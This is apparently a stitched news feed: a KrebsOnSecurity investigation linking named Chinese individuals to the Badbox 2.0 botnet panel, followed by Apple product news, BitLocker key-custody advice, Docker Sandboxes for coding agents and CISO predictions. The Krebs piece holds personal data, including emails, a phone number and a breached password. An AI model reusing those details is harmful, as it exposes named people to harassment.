Our first story of 2026, The Kimwolf Botnet is Stalking Your Local Network, detailed the unique and highly invasive methods Kimwolf uses to spread. The story warned that the vast majority of Kimwolf infected systems were unofficial Android TV boxes that are typically marketed as a way to watch unlimited (pirated) movie and TV streaming services for a one-time fee.
Our January 8 story, Who Benefitted from the Aisuru and Kimwolf Botnets?, cited multiple sources saying the current administrators of Kimwolf went by the nicknames “Dort” and “Snow.” Earlier this month, a close former associate of Dort and Snow shared what they said was a screenshot the Kimwolf botmasters had taken while logged in to the Badbox 2.0 botnet control panel.
That screenshot, a portion of which is shown below, shows seven authorized users of the control panel, including one that doesn’t quite match the others: According to my source, the account “ABCD” (the one that is logged in and listed in the top right of the screenshot) belongs to Dort, who somehow figured out how to add their email address as a valid user of the Badbox 2.0 botnet.
The control panel for the Badbox 2.0 botnet lists seven authorized users and their email addresses. Click to enlarge.
Badbox has a storied history that well predates Kimwolf’s rise in October 2025. In July 2025, Google filed a “John Doe” lawsuit (PDF) against 25 unidentified defendants accused of operating Badbox 2.0, which Google described as a botnet of over ten million unsanctioned Android streaming devices engaged in advertising fraud. Google said Badbox 2.0, in addition to compromising multiple types of devices prior to purchase, also can infect devices by requiring the download of malicious apps from unofficial marketplaces.
Google’s lawsuit came on the heels of a June 2025 advisory from the Federal Bureau of Investigation (FBI), which warned that cyber criminals were gaining unauthorized access to home networks by either configuring the products with malware prior to the user’s purchase, or infecting the device as it downloads required applications that contain backdoors — usually during the set-up process.
The FBI said Badbox 2.0 was discovered after the original Badbox campaign was disrupted in 2024. The original Badbox was identified in 2023, and primarily consisted of Android operating system devices (TV boxes) that were compromised with backdoor malware prior to purchase.
KrebsOnSecurity was initially skeptical of the claim that the Kimwolf botmasters had hacked the Badbox 2.0 botnet. That is, until we began digging into the history of the qq.com email addresses in the screenshot above.
CATHEAD
An online search for the address [email protected] (pictured in the screenshot above as the user “Chen“) shows it is listed as a point of contact for a number of China-based technology companies, including:
–Beijing Hong Dake Wang Science & Technology Co Ltd.
–Beijing Hengchuang Vision Mobile Media Technology Co. Ltd.
–Moxin Beijing Science and Technology Co. Ltd.
The website for Beijing Hong Dake Wang Science is asmeisvip[.]net, a domain that was flagged in a March 2025 report by HUMAN Security as one of several dozen sites tied to the distribution and management of the Badbox 2.0 botnet. Ditto for moyix[.]com, a domain associated with Beijing Hengchuang Vision Mobile.
A search at the breach tracking service Constella Intelligence finds [email protected] at one point used the password “cdh76111.” Pivoting on that password in Constella shows it is known to have been used by just two other email accounts: [email protected] and [email protected].
Constella found [email protected] registered an account at jd.com (China’s largest online retailer) in 2021 under the name “陈代海,” which translates to “Chen Daihai.” According to DomainTools.com, the name Chen Daihai is present in the original registration records (2008) for moyix[.]com, along with the email address cathead@astrolink[.]cn.
Incidentally, astrolink[.]cn also is among the Badbox 2.0 domains identified in HUMAN Security’s 2025 report. DomainTools finds cathead@astrolink[.]cn was used to register more than a dozen domains, including vmud[.]net, yet another Badbox 2.0 domain tagged by HUMAN Security.
XAVIER
A cached copy of astrolink[.]cn preserved at archive.org shows the website belongs to a mobile app development company whose full name is Beijing Astrolink Wireless Digital Technology Co. Ltd. The archived website reveals a “Contact Us” page that lists a Chen Daihai as part of the company’s technology department. The other person featured on that contact page is Zhu Zhiyu, and their email address is listed as xavier@astrolink[.]cn.
A Google-translated version of Astrolink’s website, circa 2009. Image: archive.org.
Astute readers will notice that the user Mr.Zhu in the Badbox 2.0 panel used the email address [email protected]. Searching this address in Constella reveals a jd.com account registered in the name of Zhu Zhiyu. A rather unique password used by this account matches the password used by the address [email protected], which DomainTools finds was the original registrant of astrolink[.]cn.
ADMIN
The very first account listed in the Badbox 2.0 panel — “admin,” registered in November 2020 — used the email address [email protected]. DomainTools shows this email is found in the 2022 registration records for the domain guilincloud[.]cn, which includes the registrant name “Huang Guilin.”
Constella finds [email protected] is associated with the China phone number 18681627767. The open-source intelligence platform osint.industries reveals this phone number is connected to a Microsoft profile created in 2014 under the name Guilin Huang (桂林 黄). The cyber intelligence platform Spycloud says that phone number was used in 2017 to create an account at the Chinese social media platform Weibo under the username “h_guilin.”
The public information attached to Guilin Huang’s Microsoft account, according to the breach tracking service osintindustries.com.
The remaining three users and corresponding qq.com email addresses were all connected to individuals in China. However, none of them (nor Mr. Huang) had any apparent connection to the entities created and operated by Chen Daihai and Zhu Zhiyu — or to any corporate entities for that matter. Also, none of these individuals responded to requests for comment.
The mind map below includes search pivots on the email addresses, company names and phone numbers that suggest a connection between Chen Daihai, Zhu Zhiyu, and Badbox 2.0.
This mind map includes search pivots on the email addresses, company names and phone numbers that appear to connect Chen Daihai and Zhu Zhiyu to Badbox 2.0. Click to enlarge.
UNAUTHORIZED ACCESS
The idea that the Kimwolf botmasters could have direct access to the Badbox 2.0 botnet is a big deal, but explaining exactly why that is requires some background on how Kimwolf spreads to new devices. The botmasters figured out they could trick residential proxy services into relaying malicious commands to vulnerable devices behind the firewall on the unsuspecting user’s local network.
The vulnerable systems sought out by Kimwolf are primarily Internet of Things (IoT) devices like unsanctioned Android TV boxes and digital photo frames that have no discernible security or authentication built-in. Put simply, if you can communicate with these devices, you can compromise them with a single command.
Our January 2 story featured research from the proxy-tracking firm Synthient, which alerted 11 different residential proxy providers that their proxy endpoints were vulnerable to being abused for this kind of local network probing and exploitation.
Most of those vulnerable proxy providers have since taken steps to prevent customers from going upstream into the local networks of residential proxy endpoints, and it appeared that Kimwolf would no longer be able to quickly spread to millions of devices simply by exploiting some residential proxy provider.
However, the source of that Badbox 2.0 screenshot said the Kimwolf botmasters had an ace up their sleeve the whole time: Secret access to the Badbox 2.0 botnet control panel.
“Dort has gotten unauthorized access,” the source said. “So, what happened is normal proxy providers patched this. But Badbox doesn’t sell proxies by itself, so it’s not patched. And as long as Dort has access to Badbox, they would be able to load” the Kimwolf malware directly onto TV boxes associated with Badbox 2.0.
The source said it isn’t clear how Dort gained access to the Badbox botnet panel. But it’s unlikely that Dort’s existing account will persist for much longer: All of our notifications to the qq.com email addresses listed in the control panel screenshot received a copy of that image, as well as questions about the apparently rogue ABCD account.
View the full article
Krebs

Apple Considered AI-Powered iPhone Home Screen

Apple considered introducing a new Apple Intelligence feature that would dynamically re-arrange apps on the Home Screen.


The detail emerged in a report last week from The Information, which said that subordinates of software chief Craig Federighi approached him with proposals for an AI-powered iPhone ‌Home Screen‌. The feature would dynamically change the locations of apps on the ‌Home Screen‌ according to users' needs. Federighi reportedly rejected the idea, believing that it would disorient users, many of whom rely on knowing the fixed location of apps on their ‌Home Screen‌ for quick access.

With iOS 26, Apple prioritized new ‌Apple Intelligence‌ features that included Live Translation, more powerful Visual Intelligence, ChatGPT image generation in Image Playground, and actions in Shortcuts. Broader and more capable ‌Apple Intelligence‌ features are expected to arrive later this year with iOS 27, such as a Siri chatbot powered by Google Gemini.

The rest of The Information's report focused on how Apple restructured its artificial intelligence strategy under Federighi, accelerating plans to overhaul Siri by relying on external AI models after years of internal delays and organizational friction.
Tags: Apple Intelligence, Craig Federighi, Home Screen, The Information
This article, "Apple Considered AI-Powered iPhone Home Screen" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Malicious VS Code AI Extensions with 1.5 Million Installs Steal Developer Source Code

Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants, but also harbor covert functionality to siphon developer data to China-based servers. The extensions, which have 1.5 million combined installs and are still available for download from the official Visual StudioView the full article
Hacker News

Not Interested in Apple's New AirTag? Snag the First Gen AirTag 4-Pack for Just $69.99

Apple's AirTag 4-Pack is available for $69.99 today on Amazon, down from the original price of $99.00. Free shipping options have a delivery estimate around January 31, while Prime members should be able to get it delivered a few days sooner.

Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Overall, this is a solid second-best price on the AirTag 4-pack that's within $7 of the Amazon all-time low price, which we last tracked during the holiday season. We're not tracking any notable deals on the AirTag single pack right now.

$29 OFFAirTag 4-Pack for $69.99

Apple just announced a new model of the AirTag, which is set to feature longer range for item tracking, a louder speaker, and the same $99 price tag for a 4-Pack. The first generation model is still a solid Bluetooth tracker, particularly at Amazon's $29 discount this week.

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Not Interested in Apple's New AirTag? Snag the First Gen AirTag 4-Pack for Just $69.99" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Microsoft handed over BitLocker keys to law enforcement, raising enterprise data control concerns

Microsoft gave Windows users’ BitLocker encryption keys for to US law enforcement officers, providing access to encrypted data, according to a news report.
The US Federal Bureau of Investigation approached Microsoft with a search warrant in early 2025, seeking keys to unlock encrypted data stored on three laptops in a case of alleged fraud involving the COVID unemployment assistance program in Guam. As the keys were stored on a Microsoft server, Microsoft adhered to the legal order and handed over the encryption keys, Forbes reported on Friday.
Microsoft did not immediately respond to a request for comment.
There have been instances in the past where the big tech companies were approached by law enforcement for access to devices but have resisted handing encryption keys to authorities.
BitLocker is a widely used tool for securing data at rest, whether by individuals or enterprises managing hundreds or thousands of Windows devices. By default, many Windows installations back up BitLocker recovery keys to Microsoft’s cloud services, where Microsoft can retrieve them if legally compelled with a valid order.
Custody issue, not BitLocker
BitLocker is designed to provide encryption for entire volumes, addressing the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned devices. As BitLocker is bunded with Windows 10 and Windows 11, it has effectively become the default full-disk encryption layer across Windows endpoints, say experts.
“BitLocker itself does not fail here. The software does what it is built to do, encrypts the disk, integrates into Windows, allows for easy recovery,” said Sanchit Vir Gogia, chief analyst at Greyhound Research.
While the encryption of BitLocker is robust, enterprises need to be mindful of who has custody of the keys, as this case illustrates.
“The encryption engine in BitLocker, using AES-128 or AES-256 in XTS mode, is built to resist modern cryptanalysis. Even the US Department of Homeland Security has admitted they lack the forensic tooling to break it directly. However, most enterprise fleets running Windows use tools like Intune and Autopilot to roll out and manage devices. In that flow, unless explicitly disabled, recovery keys are automatically backed up to Microsoft Entra ID. These keys are then viewable via the admin centre or retrievable through scripts,” Gogia said.
Where most enterprises go wrong
Enterprises using BitLocker should treat the recovery keys as highly sensitive, and avoid default cloud backup unless there is a clear business requirement and the associated risks are well understood and mitigated.
The safest configuration is to redirect those keys to on-premises Active Directory or a controlled enterprise key vault. Even if stored in corporate-controlled directory or service such as Microsoft Entra ID or Intune, there should be strong governance on who can read the keys, with effective logging and just-in-time access, said Amit Jaju, a global partner at Ankura Consulting. This can cut Microsoft out of the recovery loop, he said.
If keys have to reside in Microsoft’s cloud, use strong multi-factor authentication for admin roles, with conditional access and privileged-access workstations so a compromise of admin credentials does not automatically become a compromise of all keys, he said.
Enterprises should ensure strict access control and separation of duties. “Only a small, vetted group such as security operations, endpoint engineering, should have rights to view or export recovery keys. Approvals should be workflow-based, not ad hoc. Every key retrieval should leave an auditable, immutable trail, and ideally be tied to an incident or ticket ID,” said Jaju.
CISOs should also ensure that when devices are repurposed, decommissioned, or moved across jurisdictions, keys should be regenerated as part of the workflow to ensure old keys cannot be used.
Gogia warned of the long tail of insecure setups. Personal accounts linked during provisioning, or BYOD devices that silently sync keys to consumer dashboards, are invisible pathways for leakage. “If those keys sit outside your boundary, you no longer have a clean chain of custody. That’s not a theoretical risk. It’s something auditors are now actively checking,” he said.
As many breaches are not cryptographic but procedural, enterprises should have a formal playbook for when a recovery key can be used (lost PIN, internal investigation with legal approval, lawful order) and when it cannot (informal manager request to access an employee’s data), noted Jaju.
Geopolitics reshaping enterprise data and key control
Geopolitical tensions are also reshaping global trade and technology policies, something enterprises increasingly need to factor into their security strategies. As governments assert greater control over data, trade secrets and proprietary information risk becoming entangled in broader state interests.
Gogia warned, “The US CLOUD Act allows law enforcement to compel US-based providers to hand over data and keys, even if that data is hosted in Europe or Asia. Similarly, Chinese data localisation rules require keys and data to be accessible to state regulators. In India, recent legislation has introduced broad access rights for security agencies. And the EU is debating whether sovereignty must include key custody by design, not just data residency.”
If recovery keys are stored with a cloud provider, that provider may be compelled, at least in its home jurisdiction, to hand them over under lawful order, even if the data subject or company is elsewhere without notifying the company. This becomes even more critical from the point of view of a pharma company, semiconductor firm, defence contractor, or critical-infrastructure operator, as it exposes them to risks such as exposure of trade secrets in cross‑border investigations.
Jaju added, “Enterprises should assume that where keys are held, they can potentially be compelled. So where practical, ensure that the entities controlling keys are legally anchored in the jurisdiction whose laws and due-process standards you trust most. Establish board-level oversight on cross-border data access, including a register of government data-access requests, where legally permitted. For multinational companies, legal and security teams must work together to understand mutual legal-assistance treaties, CLOUD Act implications, and local interception laws.”
This article first appeared on Computerworld.

View the full article
CSOonline

Microsoft releases second out-of-band fix for Windows in a week

Outlook users have reported difficulties with Microsoft’s January Patch Tuesday updates, forcing Microsoft, once again, to patch some of its patches.
Users reported that, after applying the January 13 Windows updates, some applications became unresponsive or encountered unexpected errors when opening files from or saving files to cloud-based storage such as OneDrive or Dropbox. In particular, certain Microsoft Outlook configurations with the PST file containing a users’ messages stored on OneDrive could cause Outlook to hang or lead to sent messages going missing or previously downloaded emails being re‑downloaded.
In response, Microsoft has issued a bunch of out-of-band emergency updates for Windows 11 and 10 and Windows Server 2019, 2022, and 2025 to solve the problem.
This is not the first time that Microsoft has had to issue a patch for a patch. Just last week, it had to react when it inadvertently introduced two new bugs: an inability to connect to Windows Cloud PCs and an inability to shut down some machines with Secure Launch enabled. Prior to that, in October 2025, a patch caused a multitude of different issues, while in May 2025 Microsoft had to issue an out-of-band patch to fix a Windows 11 start-up failure.
Microsoft said the latest out-of-band updates are cumulative and include security fixes and improvements from the January 13, 2026, security update (KB5074109) and the out-of-band update (KB5077744) from January 17, 2026.
This article first appeared on Computerworld.
View the full article
CSOonline

Docker Sandboxes: Run Claude Code and Other Coding Agents Unsupervised (but Safely)

We introduced Docker Sandboxes in experimental preview a few months ago. Today, we’re launching the next evolution with microVM isolation, available now on macOS. Windows and Linux support is coming soon.
We started Docker Sandboxes to answer the question:
How do I run Claude Code or Gemini CLI safely?
Sandboxes provide disposable, isolated environments purpose-built for coding agents. Each agent runs in an isolated version of your development environment, so when it installs packages, modifies configurations, deletes files, or runs Docker containers, your host machine remains untouched.
This isolation lets you run agents like Claude Code, Gemini CLI, Codex, and Kiro with autonomy. Since they can’t harm your computer, let them run free.
Since our first preview, Docker Sandboxes have evolved. They’re now more secure, easier to use, and more powerful.
Level 4 Coding Agent Autonomy
Claude Code and other coding agents fundamentally change how developers write and maintain code. But a practical question remains: how do you let an agent run unattended (without constant permission prompts), while still protecting your machine and data? 
Most developers quickly run into the same set of problems trying to solve this:
OS-level sandboxing interrupts workflows and isn’t consistent across platforms Containers seem like the obvious answer, until the agent needs to run Docker itself Full VMs work, but are slow, manual, and hard to reuse across projects We started building Docker Sandboxes specifically to fill this gap.
Docker Sandboxes: MicroVM-Based Isolation for Coding Agents
Defense-in-depth, isolation by default
Each agent runs inside a dedicated microVM Only your project workspace is mounted into the sandbox Hypervisor-based isolation significantly reduces host risk A real development environment
Agents can install system packages, run services, and modify files Workflows run unattended, without constant permission approvals Safe Docker access for coding agents
Coding agents can build and run Docker containers inside the MicroVM They have no access to the host Docker daemon One sandbox, many coding agents
Use the same sandbox experience with Claude Code, Gemini CLI, Codex, and Kiro More to come (and we’re taking requests!) Fast reset, no cleanup
If an agent goes off the rails, delete the sandbox and spin up a fresh one in seconds
What’s New Since the Preview and What’s Next
The experimental preview validated the core idea: coding agents need an execution environment with clear isolation boundaries, not a stream of permission prompts. The early focus was developer experience, making it easy to spin up an environment that felt natural and productive for real workflows.
As Matt Pocock put it, “Docker Sandboxes have the best DX of any local AI coding sandbox I’ve tried.”
With this release, we’re making Sandboxes more powerful and secure with no compromise on developer experience.
What’s New
MicroVM-based isolation
Sandboxes now run on dedicated microVMs, adding a hard security boundary.
Network isolation with allow and deny lists
Control over coding agent network access.
Secure Docker execution for agents
Docker Sandboxes are the only sandboxing solution we’re aware of that allows coding agents to build and run Docker containers while remaining isolated from the host system.
What’s Next
We’re continuing to expand Docker Sandboxes based on developer feedback:
Windows support MCP Gateway support Ability to expose ports to the host device and access host-exposed services Support for additional coding agents Docker Sandboxes were made for developers who want to run coding agents unattended, experiment freely, and recover instantly when something goes wrong. They extend the usability of containers’ isolation principles but with hard boundaries.
If you’ve been holding back on using agents because of permission prompts, system risk, or Docker-in-Docker limitations, Docker Sandboxes are built to remove those constraints.
We’re iterating quickly, and feedback from real-world usage will directly shape what comes next.

View the full article
reporter

iOS 26.2.1 and watchOS 26.2.1 Are Coming Soon, Here's What's New

Apple today confirmed that iOS 26.2.1 and watchOS 26.2.1 are on the way. The updates will likely be released this week, so keep an eye out as early as today.


watchOS 26.2.1 was mentioned in Apple's press release for the new AirTag today, and iOS 26.2.1 is mentioned in fine print on the new AirTag's product page.

While these will be minor software updates, they do include a few things:
The new AirTag requires an iPhone running iOS 26.2.1 or later.
watchOS 26.2.1 expands the Precision Finding feature to the Apple Watch Series 9 and later, and Apple Watch Ultra 2 and later. We have not yet confirmed if this is only for the new AirTag, or if it also works with the original AirTag.Beyond that, iOS 26.2.1 might include bug fixes and/or patch security vulnerabilities.Related Roundups: iOS 26, iPadOS 26Related Forum: iOS 26
This article, "iOS 26.2.1 and watchOS 26.2.1 Are Coming Soon, Here's What's New" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Unveils New AirTag With Longer Range, Louder Speaker, and More

Apple today introduced the next-generation AirTag, with key features including longer range for tracking items and a louder speaker.


With the new AirTag, Apple says the Precision Finding feature works up to 50% farther away from an item compared to the previous-generation model. The new AirTag also features an upgraded Bluetooth chip for improved overall range.

An updated internal design results in the new AirTag having a 50% louder speaker compared to the previous-generation model, according to Apple.

The new AirTag is available to order on Apple.com and in the Apple Store app starting today, and it will be available at Apple Store locations later this week. In the U.S., pricing remains set at $29 for an individual AirTag, while a four pack continues to cost $99.Tag: AirTag
This article, "Apple Unveils New AirTag With Longer Range, Louder Speaker, and More" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Introduces New Black Unity Apple Watch Band

Apple today introduced a vibrant new Black Unity Apple Watch band called the "Unity Connection Braided Solo Loop."



The band features the colors of the Pan-African flag, containing multiple shades of red, green, and black. It is made by weaving recycled polyester yarn filaments around ultrathin silicone threads using precision-braiding machinery. It is soft with a textured feel, and is sweat and water resistant.

The Unity Connection Braided Solo Loop honors Black History Month and celebrates "the power of connection," according to Apple.



The new special edition band is available in 42mm and 46mm case sizes, in band sizes from zero to 12. It is available to order now, and will arrive at Apple Stores starting later this week. Apple continues to sell two other Black Unity bands: Unity Bloom and Unity Rhythm.
This article, "Apple Introduces New Black Unity Apple Watch Band" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Strava Apple Watch App Gains Route Navigation in Beta

Strava appears to be rolling out full route navigation and mapping to its watchOS app, bringing the long-awaited functionality to runners, hikers, and cyclists with Apple Watch for the first time.


The feature, which remains in beta, allows users to select a pre-loaded route, view elevation details, and follow directions directly from their wrist without having to look at their iPhone. Strava users on Reddit noted the feature began appearing over the weekend.

Since this time last year, Strava users have been able to share an Apple Fitness+ workout directly to the Strava app, but the ability to get turn-by-turn directions on an outdoor walk/run or bike ride feels like more of a game-changer for users of the fitness service.

Both paying and non-paying Strava users currently seem to have access to the beta feature, but it's unclear whether it will be reserved for paying subscribers when finalized. Strava has yet to officially comment on the rollout. Tag: Strava
This article, "Strava Apple Watch App Gains Route Navigation in Beta" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Winning Against AI-Based Attacks Requires a Combined Defensive Approach

If there’s a constant in cybersecurity, it’s that adversaries are always innovating. The rise of offensive AI is transforming attack strategies and making them harder to detect. Google’s Threat Intelligence Group, recently reported on adversaries using Large Language Models (LLMs) to both conceal code and generate malicious scripts on the fly, letting malware shape-shift in real-time to evadeView the full article
Hacker News

Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers

The North Korean threat actor known as Konni has been observed using PowerShell malware generated using artificial intelligence (AI) tools to target developers and engineering teams in the blockchain sector. The phishing campaign has targeted Japan, Australia, and India, highlighting the adversary's expansion of the targeting scope beyond South Korea, Russia, Ukraine, and European nations, CheckView the full article
Hacker News

Dobrindt zu Cyberangriffen: “Wir werden zurückschlagen”

hotocosmos1 – shutterstock.com
Die Bundesregierung will auf Cyberangriffe künftig offensiver reagieren. “Wir werden zurückschlagen, auch im Ausland. Wir werden Angreifer stören und ihre Infrastruktur zerstören”, sagte Bundesinnenminister Alexander Dobrindt (CSU) der «Süddeutschen Zeitung». Deutschland werde die Schwelle für solche Schritte niedrig ansetzen.
Verantwortlich für solche Gegenschläge sollen laut Dobrindt Geheimdienste und das Bundeskriminalamt gemeinsam sein. Um die Arbeit der verschiedenen Ebenen besser zu koordinieren, plane das Innenministerium ein neues Abwehrzentrum gegen hybride Gefahren, das derzeit vom Bundesamt für Verfassungsschutz vorbereitet werde und im Laufe dieses Jahres seine Arbeit aufnehmen solle.
Geheimdienste sollen neue Befugnisse bekommen
Dobrindt beklagte, Deutschland erlebe ständig Cyberangriffe – auf Institutionen, Infrastruktur und Unternehmen. Oft gingen die Attacken von Gruppen aus, die Verbindungen zu staatlichen Geheimdiensten hätten und von diesen finanziert würden, so der CSU-Politiker mit Blick auf hybride Angriffe aus Russland und anderen Teilen der Welt. “Das können wir nicht hinnehmen.”
Deutschlands Geheimdienste sollen Dobrindt zufolge auch bei der Informationsbeschaffung und weiteren Aktivitäten neue Befugnisse bekommen. “Wir waren zu lange abhängig von den Informationen anderer. Für mich ist klar: Wir brauchen auch eine Zeitenwende bei den Geheimdiensten”, sagte er. Er wolle den Diensten ermöglichen, selbst an mehr Informationen zu kommen und auch operativ zu handeln. Bereits im ersten Halbjahr werde er dafür Gesetze vorlegen. (dpa/jm)

View the full article
CSOonline

CISO’s predictions for 2026

Last year was defined by AI hype, new attack models, and intensifying global tensions. As 2026 begins, security teams are asking what the next phase will look like. Will AI continue to accelerate risk, or will controls and governance finally catch up?
CSO spoke to 10 security leaders about their predictions and aspirations for 2026.
Governance scrambles to keep pace with AI
As AI becomes deeply embedded in day-to-day business operations, security leaders are being pushed to scale governance models far faster than before. For Barry Hensley, CISO at Brown & Brown Insurance, this translates to strengthening data guardrails by expanding data loss protection and monitoring, tightening identity controls, and introducing governance across both human and machine identities.
That push towards structure and oversight is also reshaping how organizations define security at scale. As United Airlines CISO Deneen DeFiore puts it, 2026 security will be less about perimeter defense and more about operational resilience at scale. “Threat actors will increasingly use generative AI to automate reconnaissance, social engineering, and exploit chaining, while defenders will rely on AI to prioritize risk, accelerate detection, and reduce response times,” she says. “The differentiator won’t be whether organizations use AI, but how well they govern, tune, and trust it.”
Meanwhile, Repurpose It CISO Noel Toal predicts that AI risk frameworks will increasingly reach board level. He believes these frameworks will give directors the structure and confidence to ask harder questions about AI exposure, triggering audits and help unlock long-needed security funding.
DeFiore also expects governance conversations to shift beyond traditional risk management and towards continuous cyber resilience. “Boards and regulators are already asking not just, ‘Can you prevent an attack?’ but “Can you continue operating when one happens?’” She believes that changes will drive deeper investment in identity security, segmentation, recovery testing, and third-party resilience rather than point solutions.
AI agents to reshape the threat landscape
But those same AI technologies are also changing the threat landscape. Toal points to a recent Anthropic report that documented the first large-scale AI-enabled cyberattack as an early warning sign. “I guarantee attackers will be more focused on using AI agents for what they want than a lot of businesses, because businesses in general are still very slow to adopt AI agents.”
In response, Toal says organizations will need to secure their ownAI agents with the same rigor applied to human users. “We’ll have to treat internal AI agents as identities, and monitor what they access, when they run, and whether their behavior makes sense,” he says. Without that shift, he cautions, organizations risk unleashing tools inside their networks that attackers could readily turn against them.
Challenger CISO Katie Payten agrees the rise of agentic AI fundamentally expands the identity attack surface. “The perimeter isn’t just the external perimeter anymore; identity is the perimeter.” She adds that as organizations deploy AI agents internally, governance must extend beyond human users. “Knowing what your agent has access to, how it’s making decisions, and taking responsibility for that will be essential.”
As AI becomes more deeply integrated, the sensitive data these systems rely on will become “an increasingly attractive target”, with more AI-enabled attack methods “poised to occupy a growing share of the threat landscape,” according to Michael Garvin, CISO at Jaggaer. As a result, he believes data security posture management will also become more important. “Because AI depends on large volumes of high-quality, sensitive data, organizations will need better visibility into how that data is accessed, classified, and protected.”
For Gergana Winzer, partner and cyber security mid-market lead at KPMG, the real threat with AI is not just scale, but autonomy. She warns that AI-driven attacks will increasingly make their own target and execution decisions, reducing the need for human involvement. “Everything can be automated today, not only on the side of companies, but also on the side of the criminals,” she says, raising questions about how AI-enabled threats could extend beyond the digital realm into the physical world through AI-powered drones, for instance.
Security teams will consolidate visibility and automate response
When asked about what else 2026 could mean for the global security industry, Ramsay Healthcare CISO Manal Al-Sharif believes AI will play a crucial role in helping consolidate telemetry into a single view. “When you bring everything in, it’s easy to triage and prioritize,” she says. “Having that single point of view means you’re correlating everything at the same time, so you know where you’re exposed most … [and] before those threats become incidents.”
Garvin expects security strategies to evolve inside SOCs as AI becomes more embedded. “The biggest shift will be the deeper integration of AI into defensive security operations. Organizations will increasingly invest in securing AI models and data pipelines, and they will evolve penetration testing and adversarial testing approaches to evaluate AI systems with the same rigor applied to traditional applications.”
Nadia Veeran-Patel, CISO at LRMG, has already seen this reshape incident workflows firsthand. “Our analysts were looking at incidents individually as they came through as alerts, but when AI brought them together as a collection, you suddenly realize those alerts are actually a series of events that led to something bigger.”
DeFiore also expects a fundamental shift in how security teams operate day to day. In 2026, she wants teams spending less time reacting to alerts and more time on anticipation and enablement, by using automation, better data, and tighter integration with IT and business partners to reduce friction and accelerate decision-making.
She adds what’s equally important is continued investment in people and culture. “Technology evolves quickly, but resilient organizations are built by teams that are well-trained, empowered, and aligned to a shared mission,” she says. “Creating clarity around risk ownership and decision-making is just as critical as any tool we deploy. Ultimately, success looks like a security program that enables innovation, withstands disruption, and earns trust at every level of the organization, from the boardroom to the front line.”
Toal expects AI-driven orchestration to become a defining feature of modern SOCs in 2026, as AI increasingly isolates compromised endpoints, blocks malicious IPs, rolls back ransomware in real time, and maps an attacker’s path. “The mean time to response would be vastly reduced. Instead of taking hours to respond to an incident, you could start to respond hopefully within seconds … [and] engage properly.”
SMEs will become prime targets amid rising automation
Winzer adds 2026 will mark a decisive shift, with SMEs becoming primary targets for ransomware. According to the 2025 Verizon data breach report, ransomware made up 44% of all breaches globally, and SMEs represented a disproportionate percentage of victims.
“Why? Because they’re easy now … the rationale is they have limited security maturity and they cannot absorb outages, so they end up paying [the ransomware], even though the government is saying, ‘Don’t pay’. But it’s really difficult for them to negotiate because they don’t have the budget to put proper recovery plans in place.”
Winzer warns that AI-driven reconnaissance is accelerating this trend. “AI today is very capable. You can press a button and very quickly do a huge amount of damage within a few seconds.” Combined with gaps in mid-market MSSP coverage, which are “not necessarily as complete”, she says that makes it very easy for the attackers to go after SMEs.
Veeran-Patel has seen a similar escalation in criminal tactics. “We have seen attackers routinely employing what we call triple extortion, where they combine not only data encryption, data leaking/extortion, and also leveraging third parties, like customers, regulators, and vendors, to put pressure on their victims to pay the ransoms.”
Even so, Winzer is cautiously optimistic that vendors will begin delivering more tailored solutions to the mid-market. “They did not do before. Now they’re realizing this is a huge target, and it’s also an opportunity to provide services.”
Supply chains remain vulnerable as nation-state activity intensifies
Winzer sees critical infrastructure as a primary cyber battlefield. Operational environments are “far more reachable,” she says, due to IT/OT convergence, cloud-connected control systems, and remote-access pathways that remain exposed even when partial segmentation exists.
Payten warns that data risk is increasingly hidden within complex supply chains, as organizations rely on expanding ecosystems of third-party and SaaS providers. That reliance, she says, quietly compounds exposure. “We’re using so many third parties, and those third parties use their own third parties; they become fourth parties,” she says.
The challenge is not just assessing vendors at the point of engagement but maintaining visibility over where sensitive data ultimately resides. “You can’t outsource your accountability,” Payten says. “You still own the data.”
Healthcare and local councils remain high-risk targets as well, driven by low cyber budgets, sensitive population data and the high cost of downtime, Winzer adds. “Before [attackers] were going after the cash only. But now they’re looking at reputational damage, because that causes organizations to pay faster.”
Veeran-Patel expects nation-state pressure to intensify too, warning that geopolitical conflict is increasingly being played out in cyberspace. “Cyber warfare is a real thing,” she says. “Wars are no longer going to be fought on the front lines with soldiers on the ground. They are likely going to be fought with buttons.” Her concern is that many governments are still not treating the risk with the level of urgency it requires, despite signs of critical infrastructure in developing nations already being taken offline by hostile actors.
Vendors must deliver secure-by-design products
Al-Sharif believes 2026 will be the year when the industry confronts a long-ignored truth that non-malicious insiders are not the main problem. “My issue is with the technology makers,” she says. “They still give me a car with no brake, no lock, no seatbelts. They sell it to me and find a way for me to sign away my rights … my issue is that technology makers need to be held accountable for creating flawed technology.”
She predicts insecure defaults will become untenable as incidents continue to trace back to weak authentication and outdated access controls. She says the problem is especially visible in healthcare, where connected devices still arrive with default passwords and cannot be patched without voiding warranties. “I want the government to make sure there’s a way to measure how secure those devices are before I connect a life support machine to them.”
Payten echoes concerns about insecure defaults and poorly secured connected devices. From routers to smart appliances, she highlights default credentials and weak configurations remain widespread. “There are still people with default passwords on their routers … and now there are so many connected devices.”
Now is the time to prepare for post-quantum cryptography
Zoe Hearn, head of cybersecurity strategy and governance at Insignia Financial, says rising expectations from customers, regulators, and governments are pushing organizations to take a more proactive role in preparing for the post-quantum era. She points out how simply complying with emerging standards will not be enough.
“With quantum-vulnerable encryption set to be phased out by 2030, now is the time to invest in future-ready security infrastructure,” she says. For Hearn, the shift demands leadership, not just technical uplift, as quantum risk increasingly becomes a board-level conversation.
